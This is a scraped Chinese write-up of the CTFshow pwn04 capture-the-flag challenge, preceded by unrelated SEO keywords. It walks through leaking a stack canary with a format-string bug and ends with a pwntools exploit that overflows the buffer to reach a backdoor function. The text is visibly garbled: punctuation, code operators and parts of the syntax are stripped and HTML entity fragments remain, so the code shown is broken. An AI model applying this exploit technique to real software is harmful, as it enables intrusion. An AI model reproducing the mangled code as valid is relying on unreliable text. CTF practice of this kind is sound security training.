网站制作电话,电子商务网站建设知识点总结,宝安设备网站设计,贴图库外链图床wordpress插件1、CTFshow-pwn04#xff08;基础canary#xff09;
好久没碰过pwn了#xff0c;今天临时做一道吧#xff0c;毕竟刚联合了WSL和VSCode#xff0c;想着试着做一道题看看#xff0c;结果随手一点#xff0c;就是一个很少接触的#xff0c;拿来刷刷#xff1a;
…1、CTFshow-pwn04基础canary
好久没碰过pwn了今天临时做一道吧毕竟刚联合了WSL和VSCode想着试着做一道题看看结果随手一点就是一个很少接触的拿来刷刷
先查看下保护
rootMSI:/home/g01den/Temp# checksec pwn
[*] /home/g01den/Temp/pwnArch: i386-32-littleRELRO: Partial RELROStack: Canary foundNX: NX enabledPIE: No PIE (0x8048000) 除了NX之外似乎就只有 Canary了。反编译看看
有用的只有vuln函数
unsigned int vuln()
{int i; // [esp4h] [ebp-74h]char buf[100]; // [esp8h] [ebp-70h] BYREFunsigned int v3; // [esp6Ch] [ebp-Ch]v3 __readgsdword(0x14u);for ( i 0; i 1; i ){read(0, buf, 0x200u);printf(buf);}return __readgsdword(0x14u) ^ v3;
} 发现了个事儿for循环会执行两次所以这里采用第一次不溢出通过格式化字符串漏洞对Canary的值进行泄露之后就可以在合适的地方填入canary的值来绕过canary保护了。
因此思路就很明确了。
之后通过disass vuln 查看汇编代码发现了重要的一个内容它在 ret 之前进行了一次异或且指定的内存为[ebp-0xc] 0x08048677 73: nop0x08048678 74: mov eax,DWORD PTR [ebp-0xc]0x0804867b 77: xor eax,DWORD PTR gs:0x140x08048682 84: je 0x8048689 vuln910x08048684 86: call 0x8048450 __stack_chk_failplt0x08048689 91: leave 0x0804868a 92: ret 由此可知cannary存放的地址就是[ebp-0xc]看一下
1f:007c│-00c 0xffffd56c ◂— 0x7493ea00
20:0080│-008 0xffffd570 —▸ 0x8048768 ◂— dec eax /* Hello Hacker! */
21:0084│-004 0xffffd574 ◂— 0xa0000
22:0088│ ebp 0xffffd578 —▸ 0xffffd598 ◂— 0 目测cannary的值为0x7493ea00那么 想要泄露这个值需要使用格式化字符串来泄露那么来判断下对不对吧我们输入%31$x即可泄露 根据这俩进行计算可得到偏移结果是0x7c/431。
之后就是具体进行溢出了计算溢出的长度也比较简单这里直接上答案吧116字节不过第100到104为canary的值。
由于存在后门函数所以exp如下
from pwn import *#context.terminal [tmux, splitw, -h]
Locale 0if Locale 1:io process(./pwn)
else:io remote(pwn.challenge.ctf.show,28203)context(archi386, oslinux, log_leveldebug)io.recv()
payload1 b%31$x
io.sendline(payload1)
io.recvuntil(b\n)
canary int(io.recvuntil(b\n),16)getshell_addr 0x0804859Bpayload ba*100 p32(canary) ba*12 p32(getshell_addr)
io.sendline(payload)io.interactive()
